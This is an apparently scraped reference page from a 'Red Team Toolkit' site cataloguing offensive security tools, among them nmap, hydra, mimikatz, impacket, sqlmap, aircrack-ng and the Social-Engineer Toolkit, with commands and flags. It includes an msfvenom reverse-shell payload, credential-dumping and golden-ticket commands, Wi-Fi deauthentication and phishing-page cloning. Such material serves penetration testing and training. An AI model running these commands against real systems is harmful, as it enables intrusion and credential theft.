Red Team Toolkit | Security Tools & Resources

Network Scanning LinuxWindowsmacOS Command Line

Perform basic network discovery and port scanning to identify live hosts and open ports on target networks.

Initial reconnaissance to discover active hosts on a network segment.

networkscanningreconnaissancediscovery

Command/Usage

nmap -sn 192.168.1.0/24

Installation

sudo apt install nmap (Kali/Debian) | brew install nmap (macOS) | Download from nmap.org (Windows)

Additional Examples

```
nmap -sS -p- 192.168.1.100
```
```
nmap -sV -sC -p 80,443,8080 10.0.0.50
```
```
nmap --script vuln 192.168.1.100
```

nmap -iL targets.txt -oN scan_results.txt

```
nmap -sU -p 161 192.168.1.100
```

Common Options/Flags

-sn: Ping scan (no port scan)
-sS: TCP SYN stealth scan
-sU: UDP scan
-sV: Version detection
-sC: Default script scan
-p-: Scan all 65535 ports
-A: Aggressive scan (OS detection, version detection, script scanning, traceroute)

Related Tools

References

Network Scanning LinuxWindowsmacOS Command Line

Identify service versions and operating systems running on target hosts for vulnerability assessment.

Detailed enumeration of services and versions to identify potential vulnerabilities.

networkenumerationversion-detectionos-detection

Command/Usage

nmap -sV -sC -A -T4 192.168.1.100

Installation

sudo apt install nmap

Additional Examples

```
nmap -sV -p 80,443,8080 192.168.1.100
```

nmap -sV --script=http-enum 192.168.1.100

```
nmap -O -sV 192.168.1.100
```

Related Tools

References

https://nmap.org/book/man-version-detection.html

Network Scanning LinuxWindows Command Line

Ultra-fast port scanner capable of scanning the entire internet in minutes. Ideal for large-scale network reconnaissance.

Rapidly scan large network ranges to identify open ports across many hosts.

networkscanningfastlarge-scale

Command/Usage

masscan -p1-65535 192.168.1.0/24 --rate=1000

Installation

sudo apt install masscan

Additional Examples

masscan -p80,443 10.0.0.0/8 --rate=10000

masscan -p1-1000 192.168.1.100 -oL results.txt

```
masscan --top-ports 100 192.168.1.0/24
```

Common Options/Flags

--rate: Packets per second (default: 100)
-p: Port range or list
--top-ports: Scan N most common ports
-oL: Output in list format

Related Tools

References

https://github.com/robertdavidgraham/masscan

Network Scanning LinuxWindowsmacOS Command Line

Fast and modern port scanner written in Rust. Scans ports quickly then pipes results to nmap for detailed analysis.

Combine speed of Rustscan with detailed nmap scanning for efficient reconnaissance.

networkscanningrustfast

Command/Usage

rustscan -a 192.168.1.0/24 -- -sV -sC

Installation

cargo install rustscan | sudo apt install rustscan

Additional Examples

```
rustscan -a 192.168.1.100 -- -sV
```

rustscan -a 192.168.1.0/24 -p 1-65535 -- -A

rustscan -a targets.txt --ulimit 5000 -- -sC

Common Options/Flags

-a: Target IP(s) or file
-p: Port range
--ulimit: Increase file descriptor limit
--: Pass arguments to nmap

Related Tools

References

https://github.com/RustScan/RustScan

Web Enumeration LinuxWindowsmacOS Command Line

Fast, recursive directory/file brute-forcing tool written in Rust. Ideal for discovering hidden web content.

Discover hidden directories, files, and endpoints on web applications.

webenumerationbruteforcedirectory

Command/Usage

feroxbuster -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Installation

cargo install feroxbuster | sudo apt install feroxbuster

Additional Examples

feroxbuster -u http://example.com -w wordlist.txt -x php,html,js

feroxbuster -u http://example.com -w wordlist.txt --recursive --depth 3

feroxbuster -u http://example.com -w wordlist.txt -H 'Cookie: session=abc123'

Common Options/Flags

-u: Target URL
-w: Wordlist file
-x: File extensions to search for
--recursive: Recursively scan directories
--depth: Maximum recursion depth
-H: Custom headers

Related Tools

References

https://github.com/epi052/feroxbuster

Web Enumeration LinuxWindowsmacOS Command Line

Directory/file and DNS brute-forcing tool written in Go. Fast and efficient for web enumeration.

Brute-force directories and files on web servers to discover hidden content.

webenumerationbruteforcego

Command/Usage

gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Installation

go install github.com/OJ/gobuster/v3@latest | sudo apt install gobuster

Additional Examples

gobuster dir -u http://example.com -w wordlist.txt -x php,html

gobuster dir -u http://example.com -w wordlist.txt -t 50

gobuster dns -d example.com -w subdomains.txt

Common Options/Flags

dir: Directory bruteforce mode
dns: DNS subdomain bruteforce mode
-u: Target URL
-w: Wordlist file
-x: File extensions
-t: Number of threads

Related Tools

References

https://github.com/OJ/gobuster

Web Enumeration LinuxWindows Command Line

Identify web technologies including CMS, frameworks, web servers, and plugins by analyzing HTTP responses.

Fingerprint web technologies to identify potential vulnerabilities and attack vectors.

webfingerprintingenumerationcms

Command/Usage

whatweb http://192.168.1.100

Installation

sudo apt install whatweb | gem install whatweb

Additional Examples

```
whatweb -a 3 http://example.com
```

whatweb --aggression 3 http://example.com

```
whatweb -i targets.txt
```

Common Options/Flags

-a: Aggression level (1-4)
--aggression: Same as -a
-i: Input file with URLs
-v: Verbose output

Related Tools

References

https://github.com/urbanadventurer/WhatWeb

Web Enumeration LinuxWindows Command Line

Comprehensive web server scanner that checks for dangerous files, outdated server software, and misconfigurations.

Identify web server vulnerabilities, misconfigurations, and dangerous files.

webvulnerabilityscannersecurity

Command/Usage

nikto -h http://192.168.1.100

Installation

sudo apt install nikto

Additional Examples

```
nikto -h http://example.com -p 80,443
```
```
nikto -h http://example.com -C all
```

nikto -h http://example.com -Tuning 1,2,3,4,5,6,7,8,9

Common Options/Flags

-h: Target host
-p: Port(s) to scan
-C: Check for cookies
-Tuning: Scan tuning (1-9)
-Format: Output format (csv, htm, txt, xml)

Related Tools

References

https://github.com/sullo/nikto

Web Enumeration Linux Command Line

Web content scanner that searches for hidden files and directories using wordlists.

Discover hidden directories and files on web servers.

webenumerationdirectorybruteforce

Command/Usage

dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt

Installation

sudo apt install dirb

Additional Examples

dirb http://example.com /usr/share/wordlists/dirb/common.txt -X .php

dirb http://example.com /usr/share/wordlists/dirb/common.txt -a 'User-Agent: Custom'

dirb http://example.com /usr/share/wordlists/dirb/common.txt -S

Common Options/Flags

-X: File extensions to search
-a: Custom User-Agent
-S: Silent mode (no progress)
-w: Wordlist file

Related Tools

References

https://tools.kali.org/web-applications/dirb

Web Enumeration Linux Command Line

Web application brute-forcer that allows fuzzing of any HTTP parameter including headers, POST data, and authentication.

Fuzz web application parameters, directories, and endpoints to discover hidden functionality.

webfuzzingbruteforceenumeration

Command/Usage

wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://192.168.1.100/FUZZ

Installation

sudo apt install wfuzz | pip install wfuzz

Additional Examples

wfuzz -w wordlist.txt -H 'Cookie: session=FUZZ' http://example.com

wfuzz -w wordlist.txt -d 'username=admin&password=FUZZ' http://example.com/login

wfuzz -w wordlist.txt --hc 404 http://example.com/FUZZ

Common Options/Flags

-w: Wordlist file
-H: Custom header
-d: POST data
--hc: Hide responses with specific status code
-c: Output in color

Related Tools

References

https://github.com/xmendez/wfuzz

Web Enumeration LinuxWindowsmacOS Command Line

Fast web fuzzer written in Go. Ideal for directory/file bruteforcing, parameter fuzzing, and vhost discovery.

Rapidly fuzz web applications for directories, files, parameters, and subdomains.

webfuzzingfastgo

Command/Usage

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.100/FUZZ

Installation

go install github.com/ffuf/ffuf/v2@latest | sudo apt install ffuf

Additional Examples

ffuf -w wordlist.txt -u http://example.com/FUZZ -e .php,.html

ffuf -w wordlist.txt -H 'Host: FUZZ.example.com' -u http://example.com

ffuf -w wordlist.txt -X POST -d 'username=admin&password=FUZZ' -u http://example.com/login

Common Options/Flags

-w: Wordlist file
-u: Target URL
-e: File extensions
-H: Custom headers
-X: HTTP method
-d: POST data
-mc: Match status codes

Related Tools

References

https://github.com/ffuf/ffuf

Exploitation LinuxWindows Framework

Penetration testing framework for developing and executing exploit code against remote targets.

Exploit vulnerabilities, generate payloads, and perform post-exploitation activities.

exploitationframeworkpayloadspost-exploitation

Command/Usage

msfconsole

Installation

sudo apt install metasploit-framework

Additional Examples

use exploit/windows/smb/ms17_010_eternalblue

```
use auxiliary/scanner/smb/smb_version
```

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe

Common Options/Flags

msfconsole: Launch Metasploit console
msfvenom: Generate payloads
use: Load module
exploit: Execute exploit
auxiliary: Information gathering modules

Related Tools

References

Web Testing LinuxWindowsmacOS GUI Application

Integrated platform for performing security testing of web applications. Includes proxy, scanner, intruder, and repeater.

Intercept, analyze, and manipulate HTTP/HTTPS traffic for web application security testing.

webproxytestinginterception

Command/Usage

burpsuite

Installation

Download from portswigger.net/burp/communitydownload

Additional Examples

Configure browser proxy to 127.0.0.1:8080

```
Use Intruder for parameter fuzzing
```

Use Repeater to manually modify requests

Use Scanner for automated vulnerability detection

Common Options/Flags

Proxy: Intercept HTTP/HTTPS traffic
Intruder: Automated attack tool
Repeater: Manual request modification
Scanner: Automated vulnerability scanner
Decoder: Encode/decode data

Related Tools

References

https://portswigger.net/burp/documentation

Password Attacks LinuxWindows Command Line

Fast network logon cracker supporting numerous protocols. Ideal for brute-forcing login credentials.

Brute-force login credentials for various protocols including SSH, FTP, HTTP, SMB, and more.

passwordbruteforcecrackingauthentication

Command/Usage

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh

Installation

sudo apt install hydra

Additional Examples

hydra -l admin -P wordlist.txt 192.168.1.100 http-post-form '/login.php:user=^USER^&pass=^PASS^:Invalid'

hydra -L users.txt -P passwords.txt 192.168.1.100 smb

hydra -l admin -P wordlist.txt -s 2222 192.168.1.100 ssh

Common Options/Flags

-l: Single username
-L: Username list
-P: Password list
-p: Single password
-s: Port number
-t: Number of parallel tasks

Related Tools

References

https://github.com/vanhauser-thc/thc-hydra

Password Attacks LinuxWindowsmacOS Command Line

Fast password cracker supporting hundreds of hash and cipher types. Can crack password hashes from various sources.

Crack password hashes from compromised systems, databases, or password dumps.

passwordcrackinghashoffline

Command/Usage

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Installation

sudo apt install john

Additional Examples

```
john --wordlist=wordlist.txt hash.txt
```
```
john --format=raw-md5 hash.txt
```
```
john --show hash.txt
```

john --rules --wordlist=wordlist.txt hash.txt

Common Options/Flags

--wordlist: Wordlist file
--format: Hash format
--rules: Enable word mangling rules
--show: Show cracked passwords
--incremental: Incremental mode

Related Tools

References

https://www.openwall.com/john/

Password Attacks LinuxWindows Command Line

World's fastest password recovery tool utilizing GPU acceleration. Supports 300+ hash types.

Crack password hashes using GPU acceleration for significantly faster recovery.

passwordcrackinggpuhash

Command/Usage

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Installation

sudo apt install hashcat

Additional Examples

hashcat -m 1000 -a 0 hash.txt wordlist.txt

```
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
```

hashcat -m 1000 -a 1 hash.txt wordlist1.txt wordlist2.txt

Common Options/Flags

-m: Hash mode
-a: Attack mode (0=straight, 1=combinator, 3=bruteforce)
--show: Show cracked passwords
-O: Optimized kernels
--force: Ignore warnings

Related Tools

References

https://hashcat.net/hashcat/

Post-Exploitation Windows Command Line

Tool to extract plaintext passwords, hash, PIN code and kerberos tickets from memory.

Extract credentials from Windows memory after gaining initial access.

post-exploitationcredentialswindowsmemory

Command/Usage

mimikatz.exe

Installation

Download from github.com/gentilkiwi/mimikatz

Additional Examples

```
privilege::debug
```
```
sekurlsa::logonpasswords
```
```
lsadump::sam
```

kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-... /krbtgt:hash

Common Options/Flags

privilege::debug: Enable debug privilege
sekurlsa::logonpasswords: Extract passwords from memory
lsadump::sam: Dump SAM database
kerberos::golden: Create golden ticket

Related Tools

References

https://github.com/gentilkiwi/mimikatz

Post-Exploitation LinuxWindows Application

Visualize Active Directory attack paths and identify privilege escalation opportunities.

Map Active Directory relationships to find attack paths for privilege escalation and lateral movement.

post-exploitationactive-directoryenumerationvisualization

Command/Usage

bloodhound

Installation

sudo apt install bloodhound | Download from github.com/BloodHoundAD/BloodHound

Additional Examples

bloodhound-python -d example.com -u user -p password -gc dc.example.com -c all

```
SharpHound.exe -c All -d example.com
```

Import data into BloodHound GUI and query for attack paths

Common Options/Flags

-d: Domain name
-u: Username
-p: Password
-gc: Domain controller
-c: Collection method (All, Group, Computer, etc.)

Related Tools

References

https://github.com/BloodHoundAD/BloodHound

Post-Exploitation Linux Command Line

Collection of Python classes for working with network protocols. Includes tools for SMB, MSRPC, LDAP, and more.

Perform various Active Directory attacks including AS-REP roasting, DCSync, and pass-the-hash.

post-exploitationactive-directorysmbldap

Command/Usage

impacket-GetNPUsers example.com/user:password

Installation

pip install impacket | sudo apt install impacket-scripts

Additional Examples

impacket-GetNPUsers example.com/user:password -dc-ip 10.0.0.1

impacket-secretsdump example.com/user:password@10.0.0.1

impacket-psexec example.com/user:password@10.0.0.1

```
impacket-smbserver share /tmp/share
```

Common Options/Flags

GetNPUsers: AS-REP roasting
secretsdump: Dump secrets from remote machine
psexec: Execute commands remotely
smbserver: Create SMB server

Related Tools

References

https://github.com/fortra/impacket

Wireless Linux Command Line

Complete suite of tools to assess WiFi network security including packet capture, WEP/WPA cracking, and deauthentication.

Audit WiFi network security by capturing handshakes and cracking WPA/WPA2 passwords.

wirelesswificrackingsecurity

Command/Usage

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

Installation

sudo apt install aircrack-ng

Additional Examples

```
airmon-ng start wlan0
```
```
airodump-ng wlan0mon
```

aireplay-ng --deauth 10 -a BSSID wlan0mon

```
aircrack-ng -w wordlist.txt capture.cap
```

Common Options/Flags

airmon-ng: Enable monitor mode
airodump-ng: Capture packets
aireplay-ng: Inject packets
aircrack-ng: Crack WEP/WPA keys

Related Tools

References

https://www.aircrack-ng.org/

Wireless Linux Command Line

Brute-force attack tool against WiFi Protected Setup (WPS) to recover WPA/WPA2 passphrases.

Exploit WPS vulnerabilities to recover WiFi passwords on vulnerable routers.

wirelesswpsbruteforcewifi

Command/Usage

reaver -i wlan0mon -b BSSID -vv

Installation

sudo apt install reaver

Additional Examples

reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

```
reaver -i wlan0mon -b BSSID -c 6 -vv
```

reaver -i wlan0mon -b BSSID -L -N -d 15 -T .5 -vv

Common Options/Flags

-i: Interface
-b: BSSID of target
-c: Channel
-vv: Verbose output
-L: Ignore locked state
-N: Don't send NACK packets

Related Tools

References

https://github.com/gabrielrcouto/reaver-wps

Social Engineering Linux Framework

Open-source penetration testing framework designed for social engineering attacks including phishing and credential harvesting.

Create convincing phishing campaigns, credential harvesting pages, and social engineering attacks.

social-engineeringphishingframework

Command/Usage

setoolkit

Installation

sudo apt install set

Additional Examples

```
Select: 1) Social-Engineering Attacks
```
```
Select: 2) Website Attack Vectors
```

Select: 3) Credential Harvester Attack Method

```
Select: 2) Site Cloner
```

Common Options/Flags

Social-Engineering Attacks: Main menu
Website Attack Vectors: Web-based attacks
Credential Harvester: Clone sites and harvest credentials
Metasploit Browser Exploit: Browser-based exploits

Related Tools

References

https://github.com/trustedsec/social-engineer-toolkit

Vulnerability Assessment LinuxWindowsmacOS Command Line

Use Nmap's vulnerability detection scripts to identify known security issues on target systems.

Identify known vulnerabilities including CVEs, misconfigurations, and security weaknesses.

vulnerabilityscanningcvesecurity

Command/Usage

nmap --script vuln 192.168.1.100

Installation

sudo apt install nmap

Additional Examples

nmap --script vuln -p 80,443 192.168.1.100

nmap --script vuln --script-args=unsafe=1 192.168.1.100

nmap --script 'vuln and safe' 192.168.1.100

Common Options/Flags

--script vuln: Run vulnerability detection scripts
--script-args: Script arguments
unsafe=1: Run intrusive scripts

Related Tools

References

https://nmap.org/book/nse.html

Vulnerability Assessment LinuxWindowsmacOS Command Line

Automated tool for detecting and exploiting SQL injection flaws. Can dump databases and execute commands.

Automate SQL injection detection and exploitation to extract data from vulnerable databases.

sql-injectiondatabaseexploitationautomation

Command/Usage

sqlmap -u 'http://192.168.1.100/page.php?id=1' --dbs

Installation

sudo apt install sqlmap | pip install sqlmap

Additional Examples

sqlmap -u 'http://example.com/page.php?id=1' --dbs

sqlmap -u 'http://example.com/page.php?id=1' -D database -T users --dump

```
sqlmap -r request.txt --batch
```

sqlmap -u 'http://example.com/page.php?id=1' --os-shell

Common Options/Flags

-u: Target URL
--dbs: Enumerate databases
-D: Database name
-T: Table name
--dump: Dump table contents
--os-shell: Get OS shell
-r: Load HTTP request from file

Related Tools

References

https://github.com/sqlmapproject/sqlmap

Information Gathering Linux Command Line

Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources.

Perform OSINT reconnaissance to gather information about target organizations and domains.

osintreconnaissanceinformation-gatheringsubdomains

Command/Usage

theHarvester -d example.com -b all

Installation

sudo apt install theharvester | pip install theHarvester

Additional Examples

```
theHarvester -d example.com -b google
```

theHarvester -d example.com -b all -l 500

```
theHarvester -d example.com -b linkedin
```
```
theHarvester -d example.com -b shodan
```

Common Options/Flags

-d: Domain to search
-b: Data source (google, bing, linkedin, etc.)
-l: Limit number of results
-f: Save results to file

Related Tools

References

https://github.com/laramies/theHarvester

Information Gathering LinuxWindows Command Line

Fast subdomain enumeration tool that uses search engines and DNS records to discover subdomains.

Discover subdomains of target domains for broader attack surface identification.

subdomainenumerationreconnaissanceosint

Command/Usage

sublist3r -d example.com

Installation

pip install sublist3r | sudo apt install sublist3r

Additional Examples

```
sublist3r -d example.com
```
```
sublist3r -d example.com -t 10
```
```
sublist3r -d example.com -b
```
```
sublist3r -d example.com -p 80,443
```

Common Options/Flags

-d: Domain name
-t: Number of threads
-b: Brute force mode
-p: Ports to check

Related Tools

References

https://github.com/aboul3la/Sublist3r

Information Gathering Linux Command Line

Tool for enumerating information from Windows and Samba systems including users, shares, and groups.

Enumerate SMB shares, users, groups, and password policies on Windows/Samba systems.

smbenumerationwindowsshares

Command/Usage

enum4linux -a 192.168.1.100

Installation

sudo apt install enum4linux

Additional Examples

```
enum4linux -a 192.168.1.100
```
```
enum4linux -U 192.168.1.100
```
```
enum4linux -S 192.168.1.100
```
```
enum4linux -P 192.168.1.100
```

Common Options/Flags

-a: All simple enumeration
-U: Get userlist
-S: Get sharelist
-P: Get password policy information
-G: Get group and member list

Related Tools

References

https://github.com/CiscoCXSecurity/enum4linux

Information Gathering Linux Command Line

Command-line SMB client for accessing Windows shares, listing directories, and transferring files.

Access and enumerate SMB shares, download files, and interact with Windows file shares.

smbshareswindowsfile-transfer

Command/Usage

smbclient //192.168.1.100/share -U username

Installation

sudo apt install smbclient

Additional Examples

smbclient //192.168.1.100/share -U username

```
smbclient -L //192.168.1.100 -U '' -N
```

smbclient //192.168.1.100/share -U username -c 'get file.txt'

smbclient //192.168.1.100/share -U username -c 'put file.txt'

Common Options/Flags

-L: List shares
-U: Username
-N: No password
-c: Execute command
-m: Maximum protocol version

Related Tools

References

https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

Information Gathering Linux Command Line

Fast SNMP community string brute-forcing tool. Efficiently tests multiple community strings against SNMP-enabled devices.

Identify valid SNMP community strings on target systems to enable further enumeration and credential disclosure.

snmpenumerationreconnaissancenetworkcredentials

Command/Usage

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.100

Installation

sudo apt install onesixtyone

Additional Examples

onesixtyone -c community.txt 192.168.1.100

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.0/24

onesixtyone -c community.txt -i hosts.txt

```
onesixtyone public 192.168.1.100
```

Common Options/Flags

-c: Community string file
-i: Host file
-o: Output file
-d: Debug mode
-w: Wait time between packets (ms)

Related Tools

References

Information Gathering LinuxWindowsmacOS Command Line

Part of Net-SNMP tools suite. Walks the SNMP Management Information Base (MIB) tree to retrieve system information, configuration data, and potentially exposed credentials.

Enumerate SNMP-exposed data including system descriptions, contact information, and misconfigurations that may leak credentials.

snmpenumerationmibreconnaissancecredentials

Command/Usage

snmpwalk -v2c -c public 192.168.1.100

Installation

sudo apt install snmp (Debian/Kali) | brew install net-snmp (macOS) | Download from net-snmp.org (Windows)

Additional Examples

```
snmpwalk -v2c -c public 192.168.1.100
```

snmpwalk -v2c -c public 192.168.1.100 system

snmpwalk -v2c -c public 192.168.1.100 iso.3.6.1.2.1.1

snmpwalk -v3 -l authPriv -u snmpuser -a SHA -A authpass -x AES -X privpass 192.168.1.100

Common Options/Flags

-v: SNMP version (1, 2c, 3)
-c: Community string (v1/v2c)
-l: Security level (noAuthNoPriv, authNoPriv, authPriv)
-u: Username (v3)
-a: Authentication protocol (MD5, SHA)
-A: Authentication password
-x: Privacy protocol (DES, AES)
-X: Privacy password

Nmap - Basic Network Scan

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

Related Blog Posts

References

Nmap - Service Version Detection

Command/Usage

Installation

Additional Examples

Related Tools

References

Masscan - Fast Port Scanner

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

Rustscan - Rust-Based Port Scanner

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

Feroxbuster - Directory Bruteforcing

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

Gobuster - Directory/File Bruteforcing

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

WhatWeb - Web Technology Detection

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

Nikto - Web Server Scanner

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

DIRB - Web Content Scanner

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

WFuzz - Web Fuzzer

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

FFuF - Fast Web Fuzzer

Command/Usage

Installation

Additional Examples

Common Options/Flags

Related Tools

References

Metasploit Framework - Exploitation

Command/Usage

Installation